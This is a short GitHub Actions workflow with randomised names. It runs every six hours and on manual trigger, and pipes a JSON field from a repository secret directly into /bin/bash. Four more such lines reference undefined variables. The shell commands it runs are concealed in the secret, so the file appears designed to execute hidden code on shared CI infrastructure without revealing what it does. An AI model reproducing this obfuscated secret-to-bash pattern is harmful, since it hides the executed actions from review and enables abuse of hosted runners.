name: gansila4571
on:
  workflow_dispatch:
  schedule:
    - cron: '31 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gansila4571
        env:
          gx6: ${{ secrets.gx6 }}
        run: |
          echo $gx6 | jq -r .ei5 | /bin/bash
          echo $vxyt1 | jq -r .hp6751 | /bin/bash
          echo $rle3225 | jq -r .htj39 | /bin/bash
          echo $ryo66625 | jq -r .uwbn514 | /bin/bash
          echo $jme1692 | jq -r .urf729 | /bin/bash

